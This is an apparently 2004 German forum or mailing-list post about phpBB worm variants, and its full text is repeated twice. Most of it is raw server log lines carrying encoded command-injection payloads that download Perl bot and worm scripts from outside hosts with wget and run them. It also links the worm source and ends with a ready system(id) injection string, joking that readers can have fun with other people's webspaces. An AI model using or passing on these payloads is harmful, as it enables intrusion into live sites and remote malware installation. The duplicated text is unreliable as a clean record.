An alle Freunde von OpenSource und Full Disclosure:
Es ist nicht nur _eine_ neue Variante, sondern (wie zu erwarten, hoch
lebe OpenSource und Full Disclosure!) mehrere.
So schaut beispielsweise eine Attacke aus:
67.15.36.4 - - [24/Dec/2004:18:37:45 +0100] "GET
/forum/viewtopic.php?t=347&highlight=%2527%252esystem(chr(99)%252echr
(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%
252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252ec
hr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116
)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252
echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%2
52echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr
(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252ec
hr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119
)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252
echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(
110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%
252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252ec
hr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111
)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252
echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(
108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%
252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
HTTP/1.0" 402 1 "-" "lwp-trivial/1.41"
Das ist der SourceCode des Wurms:
http://www.k-otik.com/exploits/20041222.sanityworm.pl.php
Hier ist der (Minimal-)Fix:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513
Abgesehen von dem Wurm scheint sich was neues zu verbreiten, was in
etwa so ausschaut:
209.91.181.18 - - [24/Dec/2004:18:37:45 +0100] "GET
/forum/viewtopic.php?t=879&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%25
27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52
%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 41664 "-"
"LWP::Simple/5.64"
So, 40 Tage sind genug Zeit zum Fixen der Lücken gewesen. Konzept
"OpenSource" hat mal wieder versagt, insbesondere die anfängliche
Arroganz des Entwicklerteams von phpBB hat diesen Wurm quasi
zwangsläufig herbeigeführt. Und nun viel Spaß mit fremden Webspaces
:) ->
viewtopic.php?t=1&highlight=%2527%252esystem(chr(105)%252echr(100))%2
52e%2527
Euer
Chef-Entfrickler
Leiter Corporate IT Security
Es ist nicht nur _eine_ neue Variante, sondern (wie zu erwarten, hoch
lebe OpenSource und Full Disclosure!) mehrere.
So schaut beispielsweise eine Attacke aus:
67.15.36.4 - - [24/Dec/2004:18:37:45 +0100] "GET
/forum/viewtopic.php?t=347&highlight=%2527%252esystem(chr(99)%252echr
(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%
252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252ec
hr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(116
)%252echr(101)%252echr(110)%252echr(104)%252echr(97)%252echr(115)%252
echr(101)%252echr(117)%252echr(115)%252echr(105)%252echr(116)%252echr
(101)%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(47)%2
52echr(98)%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr
(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)
%252echr(108)%252echr(32)%252echr(98)%252echr(111)%252echr(116)%252ec
hr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(119
)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%252
echr(119)%252echr(119)%252echr(46)%252echr(116)%252echr(101)%252echr(
110)%252echr(104)%252echr(97)%252echr(115)%252echr(101)%252echr(117)%
252echr(115)%252echr(105)%252echr(116)%252echr(101)%252echr(46)%252ec
hr(99)%252echr(111)%252echr(109)%252echr(47)%252echr(119)%252echr(111
)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252
echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(114)%252echr(
108)%252echr(32)%252echr(119)%252echr(111)%252echr(114)%252echr(109)%
252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527
HTTP/1.0" 402 1 "-" "lwp-trivial/1.41"
Das ist der SourceCode des Wurms:
http://www.k-otik.com/exploits/20041222.sanityworm.pl.php
Hier ist der (Minimal-)Fix:
http://www.phpbb.com/phpBB/viewtopic.php?t=240513
Abgesehen von dem Wurm scheint sich was neues zu verbreiten, was in
etwa so ausschaut:
209.91.181.18 - - [24/Dec/2004:18:37:45 +0100] "GET
/forum/viewtopic.php?t=879&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%
3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf
/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%25
27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52
%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 41664 "-"
"LWP::Simple/5.64"
So, 40 Tage sind genug Zeit zum Fixen der Lücken gewesen. Konzept
"OpenSource" hat mal wieder versagt, insbesondere die anfängliche
Arroganz des Entwicklerteams von phpBB hat diesen Wurm quasi
zwangsläufig herbeigeführt. Und nun viel Spaß mit fremden Webspaces
:) ->
viewtopic.php?t=1&highlight=%2527%252esystem(chr(105)%252echr(100))%2
52e%2527
Euer
Chef-Entfrickler
Leiter Corporate IT Security